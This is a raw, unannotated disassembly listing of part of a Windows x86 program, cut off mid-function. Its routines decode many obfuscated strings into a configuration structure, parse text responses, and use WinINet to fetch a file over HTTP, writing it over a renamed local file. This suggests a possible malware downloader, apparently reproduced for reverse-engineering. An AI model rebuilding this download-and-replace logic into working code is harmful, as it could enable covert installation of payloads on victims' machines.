sub_4028F0 proc near ; CODE XREF: sub_40C7C0+95�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, ecx
mov eax, [esi+238h]
test eax, eax
jnz loc_402D9C
mov eax, [esp+4+arg_0]
mov ecx, [esp+4+arg_4]
mov edx, [esp+4+arg_8]
mov [esi+20h], edx
mov [esi+1Ch], eax
mov [esi+18h], ecx
mov dword ptr [esi+238h], 1
mov dword ptr [esi+23Ch], 0
mov ecx, dword_4243E0
lea eax, [esi+30h]
mov [eax], ecx
mov edx, dword_4243E4
mov [eax+4], edx
mov cx, word_4243E8
mov [eax+8], cx
mov eax, dword_4243D4
lea edx, [esi+130h]
mov [edx], eax
mov ecx, dword_4243D8
mov [edx+4], ecx
mov ax, word_4243DC
mov [edx+8], ax
mov cl, byte_4243DE
push 0Bh
mov [edx+0Ah], cl
push offset dword_428A4C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+230h]
lea esp, [esp+0]
loc_402990: ; CODE XREF: sub_4028F0+A8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402990
push 25h
push offset dword_428A8C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx]
loc_4029B0: ; CODE XREF: sub_4028F0+C8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4029B0
push 28h
push offset dword_428AB4
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+4]
loc_4029D1: ; CODE XREF: sub_4028F0+E9�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4029D1
push 1Dh
push offset dword_428ADC
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+8]
loc_4029F2: ; CODE XREF: sub_4028F0+10A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4029F2
push 26h
push offset dword_428AFC
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+0Ch]
loc_402A13: ; CODE XREF: sub_4028F0+12B�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402A13
push 26h
push offset dword_428B24
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+10h]
loc_402A34: ; CODE XREF: sub_4028F0+14C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402A34
push 2Ah
push offset loc_428B4C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+14h]
loc_402A55: ; CODE XREF: sub_4028F0+16D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402A55
push 26h
push offset dword_428B78
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+18h]
loc_402A76: ; CODE XREF: sub_4028F0+18E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402A76
push 20h
push offset dword_428BA0
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+1Ch]
loc_402A97: ; CODE XREF: sub_4028F0+1AF�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402A97
push 24h
push offset dword_428BC0
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+20h]
loc_402AB8: ; CODE XREF: sub_4028F0+1D0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402AB8
push 26h
push offset dword_428BE4
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+24h]
lea esp, [esp+0]
loc_402AE0: ; CODE XREF: sub_4028F0+1F8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402AE0
push 22h
push offset loc_428C0C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+28h]
loc_402B01: ; CODE XREF: sub_4028F0+219�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402B01
push 21h
push offset dword_428C30
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+2Ch]
loc_402B22: ; CODE XREF: sub_4028F0+23A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402B22
push 1Fh
push offset dword_428C54
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+30h]
loc_402B43: ; CODE XREF: sub_4028F0+25B�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402B43
push 1Dh
push offset dword_428C74
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+34h]
loc_402B64: ; CODE XREF: sub_4028F0+27C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402B64
push 26h
push offset dword_428C94
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+38h]
loc_402B85: ; CODE XREF: sub_4028F0+29D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402B85
push 23h
push offset dword_428CBC
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+3Ch]
loc_402BA6: ; CODE XREF: sub_4028F0+2BE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402BA6
push 23h
push offset dword_428CE0
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+40h]
loc_402BC7: ; CODE XREF: sub_4028F0+2DF�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402BC7
push 24h
push offset dword_428D04
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+44h]
loc_402BE8: ; CODE XREF: sub_4028F0+300�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402BE8
push 1Dh
push offset dword_428D28
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+48h]
lea esp, [esp+0]
loc_402C10: ; CODE XREF: sub_4028F0+328�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402C10
push 22h
push offset loc_428D48
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+4Ch]
loc_402C31: ; CODE XREF: sub_4028F0+349�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402C31
push 24h
push offset loc_428D6C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+50h]
loc_402C52: ; CODE XREF: sub_4028F0+36A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402C52
push 1Fh
push offset dword_428D90
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+54h]
loc_402C73: ; CODE XREF: sub_4028F0+38B�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402C73
push 20h
push (offset loc_428DAF+1)
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+58h]
loc_402C94: ; CODE XREF: sub_4028F0+3AC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402C94
push 1Dh
push offset loc_428DD0
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+5Ch]
loc_402CB5: ; CODE XREF: sub_4028F0+3CD�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402CB5
push 1Fh
push offset dword_428DF0
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+60h]
loc_402CD6: ; CODE XREF: sub_4028F0+3EE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402CD6
push 1Bh
push offset loc_428E10
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+64h]
loc_402CF7: ; CODE XREF: sub_4028F0+40F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402CF7
push 1Ch
push offset dword_428E2C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+68h]
loc_402D18: ; CODE XREF: sub_4028F0+430�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402D18
push 21h
push offset dword_428E48
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+6Ch]
lea esp, [esp+0]
loc_402D40: ; CODE XREF: sub_4028F0+458�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402D40
push 1Dh
push offset dword_428E6C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+28h]
mov edx, [edx+70h]
loc_402D61: ; CODE XREF: sub_4028F0+479�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402D61
push 1Eh
push offset dword_428E8C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, [esi+28h]
mov edx, [ecx+74h]
loc_402D82: ; CODE XREF: sub_4028F0+49A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_402D82
mov [esi+240h], cl
mov dword ptr [esi+250h], 4
loc_402D9C: ; CODE XREF: sub_4028F0+B�j
pop esi
retn 0Ch
sub_4028F0 endp
; =============== S U B R O U T I N E =======================================
sub_402DA0 proc near ; CODE XREF: sub_403950+3D5�p
; sub_403950+532�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push edi
mov edi, [esp+8+arg_0]
test edi, edi
jz loc_402E4F
mov ebx, [esp+8+arg_4]
test ebx, ebx
jz loc_402E4F
push esi
push edi
call sub_419A76
add esp, 4
push 8
push offset dword_428ECC
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push edi
call sub_4199F0
add esp, 8
push 9
push offset dword_428ED4
mov ecx, offset off_42AE60
mov esi, eax
call sub_406AE0
push eax
push edi
call sub_4199F0
add esp, 8
test esi, esi
mov edi, eax
jz short loc_402E47
test edi, edi
jz short loc_402E47
push 8
push offset dword_428EE0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [eax+1]
lea ebx, [ebx+0]
loc_402E20: ; CODE XREF: sub_402DA0+85�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E20
sub eax, edx
add esi, eax
sub edi, esi
push edi
push esi
push ebx
call sub_4198C0
add esp, 0Ch
pop esi
mov byte ptr [edi+ebx], 0
pop edi
mov eax, 1
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_402E47: ; CODE XREF: sub_402DA0+60�j
; sub_402DA0+64�j
pop esi
pop edi
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_402E4F: ; CODE XREF: sub_402DA0+8�j
; sub_402DA0+14�j
pop edi
xor eax, eax
pop ebx
retn 8
sub_402DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402E60 proc near ; CODE XREF: sub_403950+410�p
; sub_403950+540�p ...
arg_0 = dword ptr 4
push 4
push offset dword_428EE8
mov ecx, offset off_42AE60
call sub_406AE0
push eax
mov eax, [esp+4+arg_0]
push eax
call sub_4199F0
add esp, 8
neg eax
sbb eax, eax
neg eax
retn 4
sub_402E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402E90 proc near ; CODE XREF: sub_403950+3E4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push esi
mov esi, [esp+8+arg_0]
test esi, esi
jz loc_402F62
mov ebp, [esp+8+arg_4]
test ebp, ebp
jz loc_402F62
push ebx
push edi
push esi
call sub_419A76
add esp, 4
push 0Bh
push offset loc_428EEC
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_4199F0
add esp, 8
push 0Ch
push (offset loc_428EF7+1)
mov ecx, offset off_42AE60
mov ebx, eax
call sub_406AE0
push eax
push esi
call sub_4199F0
add esp, 8
push 0Ch
push (offset loc_428F02+2)
mov ecx, offset off_42AE60
mov edi, eax
call sub_406AE0
push eax
push esi
call sub_4199F0
add esp, 8
test ebx, ebx
mov esi, eax
jz short loc_402F59
test edi, edi
jz short loc_402F59
test esi, esi
jz short loc_402F59
cmp ebx, edi
jg short loc_402F59
push 0Ch
push offset dword_428F10
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [eax+1]
loc_402F30: ; CODE XREF: sub_402E90+A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402F30
sub eax, edx
add edi, eax
sub esi, edi
dec esi
push esi
push edi
push ebp
call sub_4198C0
add esp, 0Ch
pop edi
pop ebx
mov byte ptr [esi+ebp], 0
pop esi
mov eax, 1
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_402F59: ; CODE XREF: sub_402E90+7E�j
; sub_402E90+82�j ...
pop edi
pop ebx
pop esi
xor eax, eax
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_402F62: ; CODE XREF: sub_402E90+8�j
; sub_402E90+14�j
pop esi
xor eax, eax
pop ebp
retn 8
sub_402E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F70 proc near ; CODE XREF: sub_403950+5A2�p
; sub_403950+5C3�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
push esi
push eax
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_402F8B
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_402F8B: ; CODE XREF: sub_402F70+15�j
mov ecx, esi
lea esi, [ecx+1]
loc_402F90: ; CODE XREF: sub_402F70+25�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_402F90
sub ecx, esi
add eax, ecx
cmp byte ptr [eax], 20h
jnz short loc_402FA9
loc_402FA0: ; CODE XREF: sub_402F70+37�j
mov cl, [eax+1]
inc eax
cmp cl, 20h
jz short loc_402FA0
loc_402FA9: ; CODE XREF: sub_402F70+2E�j
mov cl, [eax]
test cl, cl
mov edx, [esp+4+arg_8]
jz short loc_402FCC
loc_402FB3: ; CODE XREF: sub_402F70+5A�j
inc eax
cmp cl, 20h
jz short loc_402FCC
cmp cl, 0Dh
jz short loc_402FCC
cmp cl, 0Ah
jz short loc_402FCC
mov [edx], cl
mov cl, [eax]
inc edx
test cl, cl
jnz short loc_402FB3
loc_402FCC: ; CODE XREF: sub_402F70+41�j
; sub_402F70+47�j ...
mov byte ptr [edx], 0
mov eax, 1
pop esi
retn 0Ch
sub_402F70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402FE0 proc near ; CODE XREF: sub_403950+2AF�p
; sub_403950+3B0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_4]
test eax, eax
push ebp
jz loc_4030AC
mov ecx, [esp+4+arg_C]
test ecx, ecx
jz loc_4030AC
mov ebp, [esp+4+arg_14]
test ebp, ebp
jz loc_4030AC
mov ecx, [esp+4+arg_8]
push ebx
push esi
push edi
push 0
push 0
push 0
push ecx
push 0
push eax
push 4
push offset dword_428F1C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esp+28h+arg_0]
push eax
push edx
call dword_42421C ; HttpOpenRequestA
mov ebx, dword_424208
mov esi, eax
xor edi, edi
lea ecx, [ecx+0]
loc_403040: ; CODE XREF: sub_402FE0+73�j
push 0
push 0
push 0
push 0
push esi
call ebx ; HttpSendRequestA
test eax, eax
jnz short loc_403065
inc edi
cmp edi, 5
jl short loc_403040
push esi
call dword_424204 ; InternetCloseHandle
pop edi
pop esi
pop ebx
xor eax, eax
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_403065: ; CODE XREF: sub_402FE0+6D�j
mov edi, [esp+10h+arg_10]
mov ebx, dword_424214
mov [esp+10h+arg_4], 0
loc_403077: ; CODE XREF: sub_402FE0+B1�j
mov eax, [esp+10h+arg_C]
push ebp
push edi
push eax
push esi
call ebx ; InternetReadFile
test eax, eax
jnz short loc_40309A
mov ecx, [esp+10h+arg_4]
inc ecx
cmp ecx, 5
mov [esp+10h+arg_4], ecx
jl short loc_403077
pop edi
pop esi
pop ebx
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_40309A: ; CODE XREF: sub_402FE0+A3�j
mov ecx, [ebp+0]
mov edx, [esp+10h+arg_C]
pop edi
pop esi
pop ebx
mov byte ptr [edx+ecx], 0
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_4030AC: ; CODE XREF: sub_402FE0+7�j
; sub_402FE0+13�j ...
xor eax, eax
pop ebp
retn 18h
sub_402FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4030C0 proc near ; CODE XREF: sub_403950+8A6�p
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_324 = dword ptr -324h
var_320 = byte ptr -320h
var_31C = dword ptr -31Ch
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 33Ch
mov eax, dword_42A290
push ebx
push esi
mov esi, [esp+344h+arg_0]
test esi, esi
mov ebx, ecx
mov [esp+344h+var_4], eax
mov [esp+344h+var_324], ebx
jnz short loc_4030FE
pop esi
xor eax, eax
pop ebx
mov ecx, [esp+33Ch+var_4]
call sub_4192B6
add esp, 33Ch
retn 4
; ---------------------------------------------------------------------------
loc_4030FE: ; CODE XREF: sub_4030C0+23�j
lea eax, [esp+344h+var_108]
push eax
push esi
call sub_40EF50
lea ecx, [esp+34Ch+var_20C]
push ecx
push esi
call sub_40EFC0
call sub_419853
push eax
lea edx, [esp+358h+var_320]
push offset dword_4243F0
push edx
call sub_419B8A
mov eax, [ebx+1Ch]
add eax, 108h
lea edx, [esp+360h+var_310]
add esp, 1Ch
sub edx, eax
loc_403140: ; CODE XREF: sub_4030C0+88�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_403140
push edi
lea edi, [esp+348h+var_310]
dec edi
loc_403150: ; CODE XREF: sub_4030C0+96�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403150
mov ax, word_4243EC
mov [edi], ax
lea eax, [esp+348h+var_320]
mov esi, eax
loc_403167: ; CODE XREF: sub_4030C0+AC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403167
lea edi, [esp+348h+var_310]
sub eax, esi
dec edi
loc_403175: ; CODE XREF: sub_4030C0+BB�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403175
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_428F24
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
mov edi, edi
loc_4031A0: ; CODE XREF: sub_4030C0+E5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031A0
lea edi, [esp+348h+var_310]
sub eax, ecx
mov esi, ecx
dec edi
loc_4031B0: ; CODE XREF: sub_4030C0+F6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4031B0
mov edx, [ebx+1Ch]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+348h+var_310]
push ecx
add edx, 108h
push edx
call dword_4240AC ; MoveFileA
test eax, eax
jnz short loc_4031F9
loc_4031DF: ; CODE XREF: sub_4030C0+151�j
pop edi
pop esi
xor eax, eax
pop ebx
mov ecx, [esp+33Ch+var_4]
call sub_4192B6
add esp, 33Ch
retn 4
; ---------------------------------------------------------------------------
loc_4031F9: ; CODE XREF: sub_4030C0+11D�j
push 0
push 0
push 0
push 0
push 0
call dword_424210 ; InternetOpenA
mov edi, eax
test edi, edi
mov [esp+348h+var_330], edi
jz short loc_4031DF
push ebp
push 0
push 0
push 3
push 0
push 0
push 50h
lea eax, [esp+364h+var_20C]
push eax
push edi
call dword_424200 ; InternetConnectA
mov ebp, eax
test ebp, ebp
mov [esp+348h+var_324], ebp
jz loc_4033C3
push 0
push 0
push 0
push 0
push 0
lea ecx, [esp+35Ch+var_104]
push ecx
push 4
push offset dword_428F2C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push ebp
call dword_42421C ; HttpOpenRequestA
mov esi, eax
test esi, esi
jz loc_4033B5
mov edi, dword_424208
xor ebx, ebx
lea ebx, [ebx+0]
loc_403280: ; CODE XREF: sub_4030C0+1D3�j
push 0
push 0
push 0
push 0
push esi
call edi ; HttpSendRequestA
test eax, eax
jnz short loc_403295
inc ebx
cmp ebx, 5
jl short loc_403280
loc_403295: ; CODE XREF: sub_4030C0+1CD�j
mov edi, dword_424218
mov [esp+344h+var_324], 4
xor ebx, ebx
loc_4032A5: ; CODE XREF: sub_4030C0+209�j
push 0
lea edx, [esp+348h+var_324]
push edx
lea eax, [esp+34Ch+var_330]
push eax
push 20000005h
push esi
call edi ; HttpQueryInfoA
test eax, eax
mov ecx, [esp+344h+var_330]
jz short loc_4032C5
test ecx, ecx
ja short loc_4032CB
loc_4032C5: ; CODE XREF: sub_4030C0+1FF�j
inc ebx
cmp ebx, 5
jl short loc_4032A5
loc_4032CB: ; CODE XREF: sub_4030C0+203�j
test eax, eax
jz loc_40339B
test ecx, ecx
jbe loc_40339B
mov ecx, [esp+344h+var_31C]
mov edx, [ecx+1Ch]
push 0
push 80h
push 2
push 0
push 0
push 40000000h
add edx, 108h
push edx
call dword_424074 ; CreateFileA
mov ebx, eax
mov eax, [esp+344h+var_330]
cmp eax, 100000h
jbe short loc_403359
push 100001h
call sub_4191BC
mov ebp, dword_424214
add esp, 4
mov edi, eax
loc_403323: ; CODE XREF: sub_4030C0+28B�j
lea eax, [esp+344h+var_334]
push eax
push 100000h
push edi
push esi
call ebp ; InternetReadFile
mov edx, [esp+344h+var_334]
push 0
lea ecx, [esp+348h+var_32C]
push ecx
push edx
push edi
push ebx
call dword_4240A8 ; WriteFile
mov eax, [esp+344h+var_334]
test eax, eax
ja short loc_403323
push edi
call sub_4198AE
mov ebp, [esp+344h+var_31C]
jmp short loc_403391
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4030C0+24C�j
inc eax
push eax
call sub_4191BC
mov ecx, [esp+348h+var_330]
add esp, 4
mov edi, eax
lea eax, [esp+344h+var_334]
push eax
push ecx
push edi
push esi
call dword_424214 ; InternetReadFile
mov eax, [esp+344h+var_334]
push 0
lea edx, [esp+348h+var_32C]
push edx
push eax
push edi
push ebx
call dword_4240A8 ; WriteFile
push edi
call sub_4198AE
loc_403391: ; CODE XREF: sub_4030C0+297�j
add esp, 4
push ebx
call dword_42406C ; CloseHandle
loc_40339B: ; CODE XREF: sub_4030C0+20D�j
; sub_4030C0+215�j
push esi
mov esi, dword_424204
call esi ; InternetCloseHandle
push ebp
call esi ; InternetCloseHandle
mov ecx, [esp+34Ch+var_330]
push ecx
call esi ; InternetCloseHandle
mov eax, 1
jmp short loc_4033CC
; ---------------------------------------------------------------------------
loc_4033B5: ; CODE XREF: sub_4030C0+1AC�j
mov esi, dword_424204
push ebp
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
jmp short loc_4033CA
; ---------------------------------------------------------------------------
loc_4033C3: ; CODE XREF: sub_4030C0+177�j
push edi
call dword_424204 ; InternetCloseHandle
loc_4033CA: ; CODE XREF: sub_4030C0+301�j
xor eax, eax
loc_4033CC: ; CODE XREF: sub_4030C0+2F3�j
mov ecx, [esp+34Ch+var_4]
pop ebp
pop edi
pop esi
pop ebx
call sub_4192B6
add esp, 33Ch
retn 4
sub_4030C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4033F0 proc near ; CODE XREF: sub_403950+AED�p
; sub_403950+B69�p
var_544 = byte ptr -544h
var_540 = dword ptr -540h
var_53C = dword ptr -53Ch
var_538 = dword ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = byte ptr -528h
var_524 = byte ptr -524h
var_519 = byte ptr -519h
var_518 = byte ptr -518h
var_514 = byte ptr -514h
var_510 = byte ptr -510h
var_414 = byte ptr -414h
var_411 = byte ptr -411h
var_410 = byte ptr -410h
var_310 = byte ptr -310h
var_30C = byte ptr -30Ch
var_20C = byte ptr -20Ch
var_204 = byte ptr -204h
var_108 = byte ptr -108h
var_100 = byte ptr -100h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 544h
mov eax, dword_42A290
push esi
mov esi, [esp+548h+arg_0]
test esi, esi
mov [esp+548h+var_4], eax
push edi
jz loc_403911
mov edi, [esp+54Ch+arg_4]
test edi, edi
jz loc_403911
lea eax, [esp+54Ch+var_310]
push eax
push esi
call sub_40EEF0
lea ecx, [esp+554h+var_108]
push ecx
push esi
call sub_40EF50
lea edx, [esp+55Ch+var_20C]
push edx
push esi
call sub_40EFC0
call sub_419853
push eax
lea eax, [esp+568h+var_528]
push offset dword_4243F0
push eax
call sub_419B8A
lea edx, [esp+570h+var_518]
add esp, 24h
mov eax, edi
sub edx, edi
lea esp, [esp+0]
loc_403470: ; CODE XREF: sub_4033F0+88�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_403470
lea eax, [esp+54Ch+var_518]
lea edx, [eax+1]
loc_403481: ; CODE XREF: sub_4033F0+96�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403481
sub eax, edx
mov cl, [esp+eax+54Ch+var_519]
push ebx
mov bl, 5Ch
cmp cl, bl
jz short loc_4034C7
lea eax, [esp+550h+var_518]
lea edx, [eax+1]
lea esp, [esp+0]
loc_4034A0: ; CODE XREF: sub_4033F0+B5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034A0
sub eax, edx
cmp [esp+eax+550h+var_519], 2Fh
jz short loc_4034C7
lea edi, [esp+550h+var_518]
dec edi
loc_4034B5: ; CODE XREF: sub_4033F0+CB�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4034B5
mov cx, word_4243BC
mov [edi], cx
loc_4034C7: ; CODE XREF: sub_4033F0+A3�j
; sub_4033F0+BE�j
lea eax, [esp+550h+var_310]
mov esi, eax
loc_4034D0: ; CODE XREF: sub_4033F0+E5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4034D0
lea edi, [esp+550h+var_518]
sub eax, esi
dec edi
mov edi, edi
loc_4034E0: ; CODE XREF: sub_4033F0+F6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4034E0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
lea edx, [esp+550h+var_518]
and ecx, 3
push edx
rep movsb
call sub_419A76
add esp, 4
push 5
push offset dword_428F30
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+554h+var_518]
push eax
call sub_4199F0
add esp, 8
test eax, eax
jz loc_4035B6
lea edi, [esp+550h+var_518]
mov byte ptr [eax], 0
dec edi
loc_403532: ; CODE XREF: sub_4033F0+148�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403532
mov cx, word_4243EC
lea eax, [esp+550h+var_528]
mov [edi], cx
mov esi, eax
lea ebx, [ebx+0]
loc_403550: ; CODE XREF: sub_4033F0+165�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403550
lea edi, [esp+550h+var_518]
sub eax, esi
dec edi
mov edi, edi
loc_403560: ; CODE XREF: sub_4033F0+176�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403560
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_428F38
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_403590: ; CODE XREF: sub_4033F0+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403590
lea edi, [esp+550h+var_518]
sub eax, ecx
mov esi, ecx
dec edi
loc_4035A0: ; CODE XREF: sub_4033F0+1B6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4035A0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4035B6: ; CODE XREF: sub_4033F0+134�j
lea edx, [esp+550h+var_414]
push edx
push 104h
call dword_4240B4 ; GetCurrentDirectoryA
lea eax, [esp+54Ch+var_410]
lea edx, [eax+1]
loc_4035D3: ; CODE XREF: sub_4033F0+1E8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035D3
sub eax, edx
cmp [esp+eax+54Ch+var_411], bl
jz short loc_403621
lea eax, [esp+54Ch+var_410]
lea edx, [eax+1]
nop
loc_4035F0: ; CODE XREF: sub_4033F0+205�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4035F0
sub eax, edx
